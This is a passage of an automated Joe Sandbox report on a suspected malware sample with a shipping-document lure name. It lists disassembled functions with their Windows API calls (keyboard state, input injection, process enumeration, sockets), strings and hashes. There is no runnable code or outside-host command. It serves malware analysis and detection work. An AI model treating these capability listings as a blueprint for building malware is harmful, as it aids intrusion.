Associated: 00000000.00000002.1659238014.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.000000000024C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.0000000000272000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659385773.000000000027C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659452562.0000000000284000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1b0000_DHL DOCS 2-0106-25.jbxd

Similarity

API ID: MessageSend$MoveWindow
String ID: Listbox
API String ID: 3315199576-2633736733
Opcode ID: 3c2e54b676caa6eb7639f2d6e2940c81b71896a167de40f5c7060352e71addde
Instruction ID: 36f4009f7866b1fffe29743b6234b81194869c1ec5a73f67e13670dd581d34f6
Opcode Fuzzy Hash: 3c2e54b676caa6eb7639f2d6e2940c81b71896a167de40f5c7060352e71addde
Instruction Fuzzy Hash: AD21BE72620219BBEB25CF54DC85EAB7B6EEF99760F108124F9449B190C671DC628BA0

Function 002249F4 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 78COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 00224A08
GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 00224A5C
SetErrorMode.KERNEL32(00000000,?,?,0024CC08), ref: 00224AD0

Strings

%lu, xrefs: 00224A6F

Memory Dump Source

Source File: 00000000.00000002.1659291241.00000000001B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true

Associated: 00000000.00000002.1659238014.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.000000000024C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.0000000000272000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659385773.000000000027C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659452562.0000000000284000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1b0000_DHL DOCS 2-0106-25.jbxd

Similarity

API ID: ErrorMode$InformationVolume
String ID: %lu
API String ID: 2507767853-685833217
Opcode ID: 0679538410de5d39b27792ae43166f7a41725485ca91ae7f1ac77314d674642b
Instruction ID: 8668e3102ae54e82b91b0fbea34c0678229bfdb40f7c69a1b98296000c037faf
Opcode Fuzzy Hash: 0679538410de5d39b27792ae43166f7a41725485ca91ae7f1ac77314d674642b
Instruction Fuzzy Hash: 10318575A00119AFD710DF54D885EAA7BF8EF09304F148099F909DB252D771EE46CB61

Function 002441EB Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 67windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 0024424F
SendMessageW.USER32(?,00000406,00000000,00640000), ref: 00244264
SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00244271

Strings

msctls_trackbar32, xrefs: 00244226

Memory Dump Source

Source File: 00000000.00000002.1659291241.00000000001B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true

Associated: 00000000.00000002.1659238014.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.000000000024C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.0000000000272000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659385773.000000000027C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659452562.0000000000284000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1b0000_DHL DOCS 2-0106-25.jbxd

Similarity

API ID: MessageSend
String ID: msctls_trackbar32
API String ID: 3850602802-1010561917
Opcode ID: a8f6f8ebcf2c28be38f01ccf222170bdf13a9af2b5dbf293f8048abfc84ca6b0
Instruction ID: 7f42da36749c99528b26e3b0cd6027cab047b0b36e9409851ef8482e0f64b861
Opcode Fuzzy Hash: a8f6f8ebcf2c28be38f01ccf222170bdf13a9af2b5dbf293f8048abfc84ca6b0
Instruction Fuzzy Hash: 6B110631250208BEEF24AF29CC06FAB3BACEF95B54F110624FE55E6090D6B1DC219B10

Function 00212F52 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 67windowCOMMON

Download Yara Rule

APIs

Part of subcall function 001B6B57: _wcslen.LIBCMT ref: 001B6B6A

Part of subcall function 00212DA7: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00212DC5
Part of subcall function 00212DA7: GetWindowThreadProcessId.USER32(?,00000000), ref: 00212DD6
Part of subcall function 00212DA7: GetCurrentThreadId.KERNEL32 ref: 00212DDD
Part of subcall function 00212DA7: AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 00212DE4

GetFocus.USER32 ref: 00212F78

Part of subcall function 00212DEE: GetParent.USER32(00000000), ref: 00212DF9

GetClassNameW.USER32(?,?,00000100), ref: 00212FC3
EnumChildWindows.USER32(?,0021303B), ref: 00212FEB

Strings

%s%d, xrefs: 00212FFF

Memory Dump Source

Source File: 00000000.00000002.1659291241.00000000001B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true

Associated: 00000000.00000002.1659238014.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.000000000024C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.0000000000272000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659385773.000000000027C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659452562.0000000000284000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1b0000_DHL DOCS 2-0106-25.jbxd

Similarity

API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows_wcslen
String ID: %s%d
API String ID: 1272988791-1110647743
Opcode ID: 42b011b8b9d7226f6471827e5636feb7785c86df5d65a3e23dfcbd2af90a8dd0
Instruction ID: 4b5fbb34c167b021e1f1999ca8968bff57901b3a9147c7222f0c59c98a4e55e7
Opcode Fuzzy Hash: 42b011b8b9d7226f6471827e5636feb7785c86df5d65a3e23dfcbd2af90a8dd0
Instruction Fuzzy Hash: 78110275310205ABCF44BF64DC85EEE37AAAFA9304F008079F9099B142DF3099998F30

Function 00245882 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 47windowCOMMON

Download Yara Rule

APIs

GetMenuItemInfoW.USER32(?,?,?,00000030), ref: 002458C1
SetMenuItemInfoW.USER32(?,?,?,00000030), ref: 002458EE
DrawMenuBar.USER32(?), ref: 002458FD

Strings

0, xrefs: 0024588F

Memory Dump Source

Source File: 00000000.00000002.1659291241.00000000001B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true

Associated: 00000000.00000002.1659238014.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.000000000024C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.0000000000272000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659385773.000000000027C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659452562.0000000000284000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1b0000_DHL DOCS 2-0106-25.jbxd

Similarity

API ID: Menu$InfoItem$Draw
String ID: 0
API String ID: 3227129158-4108050209
Opcode ID: 98d750430199ddc08f9085c8d9ab3bf7b90c4003eb61de465e956e2b5dd21a9a
Instruction ID: 743996ba1e425549ce50345e4596d46df9416ca3ba41efd0c9fbc20f604048c0
Opcode Fuzzy Hash: 98d750430199ddc08f9085c8d9ab3bf7b90c4003eb61de465e956e2b5dd21a9a
Instruction Fuzzy Hash: 3001C031510228EFDB209F11EC48FAEBBB5FF45760F108099E889DA152DB308A90EF60

Function 00247803 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 41windowCOMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32(?,002818B0,0024A364,000000FC,?,00000000,00000000,?,?,?,002076CF,?,?,?,?,?), ref: 00247805
GetFocus.USER32 ref: 0024780D

Part of subcall function 001C9BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 001C9BB2

Part of subcall function 001C9944: GetWindowLongW.USER32(?,000000EB), ref: 001C9952

SendMessageW.USER32(00EFE440,000000B0,000001BC,000001C0), ref: 0024787A

Strings

8], xrefs: 00247841, 00247852

Memory Dump Source

Source File: 00000000.00000002.1659291241.00000000001B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true

Associated: 00000000.00000002.1659238014.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.000000000024C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.0000000000272000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659385773.000000000027C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659452562.0000000000284000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1b0000_DHL DOCS 2-0106-25.jbxd

Similarity

API ID: Window$Long$FocusForegroundMessageSend
String ID: 8]
API String ID: 3601265619-438778366
Opcode ID: 5891addd27e3ee220634aa8f84ce171b0e359f43aee3b29d0151395068dd3632
Instruction ID: 5607b10d1ce0addcd3937694086ad7c831a83eda628161aca39f2cde05c0e6c8
Opcode Fuzzy Hash: 5891addd27e3ee220634aa8f84ce171b0e359f43aee3b29d0151395068dd3632
Instruction Fuzzy Hash: 840184355021008FD32DDF28E85CBB633E9AF8A320F29066DE425872E1CB31AC22CB50

Function 0021007F Relevance: 6.3, APIs: 4, Instructions: 322COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1659291241.00000000001B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true

Associated: 00000000.00000002.1659238014.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.000000000024C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.0000000000272000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659385773.000000000027C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659452562.0000000000284000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1b0000_DHL DOCS 2-0106-25.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 049d8fd83587175f661a462686c96438cece7cb6739f09f677f50df2b9132dc8
Instruction ID: 160dc08fe53587e0f1673dd42095b7eac83f2419a528721a8fda53c8e9bfbd3e
Opcode Fuzzy Hash: 049d8fd83587175f661a462686c96438cece7cb6739f09f677f50df2b9132dc8
Instruction Fuzzy Hash: 4EC15C75A1020AEFDB14CF94C898AAEB7B5FF58304F208598E815EB251D7B1EDD1CB90

Function 0023342E Relevance: 6.3, APIs: 4, Instructions: 257COMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 00233459
CoUninitialize.OLE32 ref: 00233463
VariantInit.OLEAUT32(?), ref: 0023346E
VariantClear.OLEAUT32(?), ref: 0023371B

Memory Dump Source

Source File: 00000000.00000002.1659291241.00000000001B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true

Associated: 00000000.00000002.1659238014.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.000000000024C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.0000000000272000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659385773.000000000027C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659452562.0000000000284000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1b0000_DHL DOCS 2-0106-25.jbxd

Similarity

API ID: Variant$ClearInitInitializeUninitialize
String ID:
API String ID: 1998397398-0
Opcode ID: c93ebe782ba678352e11b1b617279fe40176fa03dcc1344e1e4b36244d52d07a
Instruction ID: 440294e29696ee91340549a8e15f0c37873b52dfb9df069ab323a8873e52ecd2
Opcode Fuzzy Hash: c93ebe782ba678352e11b1b617279fe40176fa03dcc1344e1e4b36244d52d07a
Instruction Fuzzy Hash: 0CA14AB56143019FC710DF28C586A6AB7E5FF88714F04885DF98A9B3A2DB30EE01CB91

Function 00210436 Relevance: 6.2, APIs: 4, Instructions: 230COMMON

Download Yara Rule

APIs

ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,0024FC08,?), ref: 002105F0
CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,0024FC08,?), ref: 00210608
CLSIDFromProgID.OLE32(?,?,00000000,0024CC40,000000FF,?,00000000,00000800,00000000,?,0024FC08,?), ref: 0021062D
_memcmp.LIBVCRUNTIME ref: 0021064E

Memory Dump Source

Source File: 00000000.00000002.1659291241.00000000001B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true

Associated: 00000000.00000002.1659238014.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.000000000024C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.0000000000272000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659385773.000000000027C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659452562.0000000000284000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1b0000_DHL DOCS 2-0106-25.jbxd

Similarity

API ID: FromProg$FreeTask_memcmp
String ID:
API String ID: 314563124-0
Opcode ID: 273f353449221ea151a32c746524ec382eb8af8ad2e1f91553b85a1e43cf2bfb
Instruction ID: b99f3ba9bbb86beca8d8111502a07ddceb08dd22b8b48c1cf1b021225a583421
Opcode Fuzzy Hash: 273f353449221ea151a32c746524ec382eb8af8ad2e1f91553b85a1e43cf2bfb
Instruction Fuzzy Hash: 31813B71A10109EFCB04DF94C984EEEB7F9FF99315F204158E506AB250DB71AE86CB60

Function 001F1391 Relevance: 6.2, APIs: 4, Instructions: 152COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 001F14C0

Memory Dump Source

Source File: 00000000.00000002.1659291241.00000000001B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true

Associated: 00000000.00000002.1659238014.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.000000000024C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.0000000000272000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659385773.000000000027C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659452562.0000000000284000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1b0000_DHL DOCS 2-0106-25.jbxd

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 3d88dc3779f05f8782dc60e6d817a65d9dfd6a9d45253071b23acfbc9c01bc47
Instruction ID: a4f29dd2a330cbe48ccff73a0510edd9c9aa0f3aa1e6b75909889545d9eb33bd
Opcode Fuzzy Hash: 3d88dc3779f05f8782dc60e6d817a65d9dfd6a9d45253071b23acfbc9c01bc47
Instruction Fuzzy Hash: 2D414D3150050CFBDB25ABFE9C466BE3AA5EFA1330F240226FA19D72D2E73489415271

Function 00231AD6 Relevance: 6.1, APIs: 4, Instructions: 138networkCOMMON

Download Yara Rule

APIs

socket.WSOCK32(00000002,00000002,00000011), ref: 00231AFD
WSAGetLastError.WSOCK32 ref: 00231B0B
#21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 00231B8A
WSAGetLastError.WSOCK32 ref: 00231B94

Memory Dump Source

Source File: 00000000.00000002.1659291241.00000000001B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true

Associated: 00000000.00000002.1659238014.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.000000000024C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.0000000000272000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659385773.000000000027C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659452562.0000000000284000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1b0000_DHL DOCS 2-0106-25.jbxd

Similarity

API ID: ErrorLast$socket
String ID:
API String ID: 1881357543-0
Opcode ID: fd063cad7231a44879c2afc667d2f1eeb0e505f3e37b84764433f4d58fb3e528
Instruction ID: 9e19b63df0fa96c3231c8699e4d5c9c586c7b3c41c14e9bf4f8abd301c53af08
Opcode Fuzzy Hash: fd063cad7231a44879c2afc667d2f1eeb0e505f3e37b84764433f4d58fb3e528
Instruction Fuzzy Hash: 5541C374600200AFE720AF24D88AF6A77E5AB54718F54848CF91A9F7D2D772DD52CB90

Function 001EB41F Relevance: 6.1, APIs: 4, Instructions: 133COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1659291241.00000000001B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true

Associated: 00000000.00000002.1659238014.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.000000000024C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.0000000000272000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659385773.000000000027C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659452562.0000000000284000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1b0000_DHL DOCS 2-0106-25.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 88e74604e1bb2adee3c32b3ceb966e6aa5bec0be321085cc315f837a5598fb2c
Instruction ID: 672ad9ea4469452590b32411c32ffc795610b5134e9a158ddb7f7fc9b25b987e
Opcode Fuzzy Hash: 88e74604e1bb2adee3c32b3ceb966e6aa5bec0be321085cc315f837a5598fb2c
Instruction Fuzzy Hash: 0041E672A04B44BFD7259F79CC81B6FBBA9EB94710F10452EF542DB2C2D771A9018780

Function 002256D9 Relevance: 6.1, APIs: 4, Instructions: 110fileCOMMON

Download Yara Rule

APIs

CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 00225783
GetLastError.KERNEL32(?,00000000), ref: 002257A9
DeleteFileW.KERNEL32(00000002,?,00000000), ref: 002257CE
CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 002257FA

Memory Dump Source

Source File: 00000000.00000002.1659291241.00000000001B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true

Associated: 00000000.00000002.1659238014.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.000000000024C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.0000000000272000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659385773.000000000027C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659452562.0000000000284000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1b0000_DHL DOCS 2-0106-25.jbxd

Similarity

API ID: CreateHardLink$DeleteErrorFileLast
String ID:
API String ID: 3321077145-0
Opcode ID: f948162cadb8882f23eafc0690f8e2f44b86f6503cec68d13bef7c2e8102a53b
Instruction ID: 4f8a76a0b3357b09f0f7df449efe38d449477741857b1de1e1e9ceefc141e863
Opcode Fuzzy Hash: f948162cadb8882f23eafc0690f8e2f44b86f6503cec68d13bef7c2e8102a53b
Instruction Fuzzy Hash: E9412C39600621DFCB21DF55D445A5EBBF2EF99320B19C488E84AAB762CB74FD40CB91

Function 001ED8C3 Relevance: 6.1, APIs: 4, Instructions: 110COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(?,00000000,8BE85006,001D6D71,00000000,00000000,001D82D9,?,001D82D9,?,00000001,001D6D71,8BE85006,00000001,001D82D9,001D82D9), ref: 001ED910
MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 001ED999
GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 001ED9AB
__freea.LIBCMT ref: 001ED9B4

Part of subcall function 001E3820: RtlAllocateHeap.NTDLL(00000000,?,00281444,?,001CFDF5,?,?,001BA976,00000010,00281440,001B13FC,?,001B13C6,?,001B1129), ref: 001E3852

Memory Dump Source

Source File: 00000000.00000002.1659291241.00000000001B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true

Associated: 00000000.00000002.1659238014.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.000000000024C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.0000000000272000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659385773.000000000027C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659452562.0000000000284000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1b0000_DHL DOCS 2-0106-25.jbxd

Similarity

API ID: ByteCharMultiWide$AllocateHeapStringType__freea
String ID:
API String ID: 2652629310-0
Opcode ID: b9d768b7965e9256336b6a52dd122a1d6d3e3476bfc64686d3ba737d223e26ee
Instruction ID: 6cab86817125caf3ccca7f87cb7495b5440f2d5125b10447e64328ed17fc84d3
Opcode Fuzzy Hash: b9d768b7965e9256336b6a52dd122a1d6d3e3476bfc64686d3ba737d223e26ee
Instruction Fuzzy Hash: 10310F72A0064AABDF24CF66EC45EAE7BA5EF41314F150169FC09D7251EB35CD50CBA0

Function 0021AB9C Relevance: 6.1, APIs: 4, Instructions: 103keyboardwindowCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?,75C0C0D0,?,00008000), ref: 0021ABF1
SetKeyboardState.USER32(00000080,?,00008000), ref: 0021AC0D
PostMessageW.USER32(00000000,00000101,00000000), ref: 0021AC74
SendInput.USER32(00000001,?,0000001C,75C0C0D0,?,00008000), ref: 0021ACC6

Memory Dump Source

Source File: 00000000.00000002.1659291241.00000000001B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true

Associated: 00000000.00000002.1659238014.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.000000000024C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.0000000000272000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659385773.000000000027C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659452562.0000000000284000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1b0000_DHL DOCS 2-0106-25.jbxd

Similarity

API ID: KeyboardState$InputMessagePostSend
String ID:
API String ID: 432972143-0
Opcode ID: c802616e53aa21a722544386e78a3cf320ad64a0eebfc3ca7f4ddde2511224dd
Instruction ID: 554a82ee8c7742784dfc67486fb23355b96c8bf5e0a15a1b406c257c002914e2
Opcode Fuzzy Hash: c802616e53aa21a722544386e78a3cf320ad64a0eebfc3ca7f4ddde2511224dd
Instruction Fuzzy Hash: 51312830A213196FEF35CF698C087FA7BE5ABA9310F04421BE485921D1D37589E587D2

Function 002416DA Relevance: 6.1, APIs: 4, Instructions: 101COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32 ref: 002416EB

Part of subcall function 00213A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 00213A57
Part of subcall function 00213A3D: GetCurrentThreadId.KERNEL32 ref: 00213A5E
Part of subcall function 00213A3D: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,002125B3), ref: 00213A65

GetCaretPos.USER32(?), ref: 002416FF
ClientToScreen.USER32(00000000,?), ref: 0024174C
GetForegroundWindow.USER32 ref: 00241752

Memory Dump Source

Source File: 00000000.00000002.1659291241.00000000001B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true

Associated: 00000000.00000002.1659238014.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.000000000024C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.0000000000272000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659385773.000000000027C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659452562.0000000000284000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1b0000_DHL DOCS 2-0106-25.jbxd

Similarity

API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
String ID:
API String ID: 2759813231-0
Opcode ID: 15992a3ebf6ea056706723ecb79c311465c5a8dbdb2fbbe73bdd9203905b84f8
Instruction ID: 570236894e33a4186d3242f3771241048c5d38f544dd7d65d8d804c81617b552
Opcode Fuzzy Hash: 15992a3ebf6ea056706723ecb79c311465c5a8dbdb2fbbe73bdd9203905b84f8
Instruction Fuzzy Hash: A2315E75D10109AFCB04EFA9C881CEEBBF9EF59304B5080AAE415E7211D7319E45CBA0

Function 0021D4DC Relevance: 6.1, APIs: 4, Instructions: 86processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32 ref: 0021D501
Process32FirstW.KERNEL32(00000000,?), ref: 0021D50F
Process32NextW.KERNEL32(00000000,?), ref: 0021D52F
CloseHandle.KERNEL32(00000000), ref: 0021D5DC

Memory Dump Source

Source File: 00000000.00000002.1659291241.00000000001B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true

Associated: 00000000.00000002.1659238014.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.000000000024C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.0000000000272000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659385773.000000000027C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659452562.0000000000284000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1b0000_DHL DOCS 2-0106-25.jbxd

Similarity

API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
String ID:
API String ID: 420147892-0
Opcode ID: 9e25875442cde1c434e27f5aea0f5469f2ad1cc5944aece9f8d2152a7a577bbf
Instruction ID: f3d95033c08275b875be3522dff81da960616553ae04f2c90c3ef9f1a92a3257
Opcode Fuzzy Hash: 9e25875442cde1c434e27f5aea0f5469f2ad1cc5944aece9f8d2152a7a577bbf
Instruction Fuzzy Hash: BA31E271108301EFD300EF54D885AEFBBF8EFA9344F50082DF586861A1EB719985CB92

Function 0021D2C1 Relevance: 6.1, APIs: 4, Instructions: 78COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNEL32(?,0024CB68), ref: 0021D2FB
GetLastError.KERNEL32 ref: 0021D30A
CreateDirectoryW.KERNEL32(?,00000000), ref: 0021D319
CreateDirectoryW.KERNEL32(?,00000000,00000000,000000FF,0024CB68), ref: 0021D376

Memory Dump Source

Source File: 00000000.00000002.1659291241.00000000001B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true

Associated: 00000000.00000002.1659238014.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.000000000024C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.0000000000272000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659385773.000000000027C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659452562.0000000000284000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1b0000_DHL DOCS 2-0106-25.jbxd

Similarity

API ID: CreateDirectory$AttributesErrorFileLast
String ID:
API String ID: 2267087916-0
Opcode ID: cf5bf6dd6093b9e47705a2ac35c162b4202d8223fa100e1db09dc5adda78fdcb
Instruction ID: 1ed8007950ebeace61e6220a924150f641200eba6bc9f6d80424820be22994e4
Opcode Fuzzy Hash: cf5bf6dd6093b9e47705a2ac35c162b4202d8223fa100e1db09dc5adda78fdcb
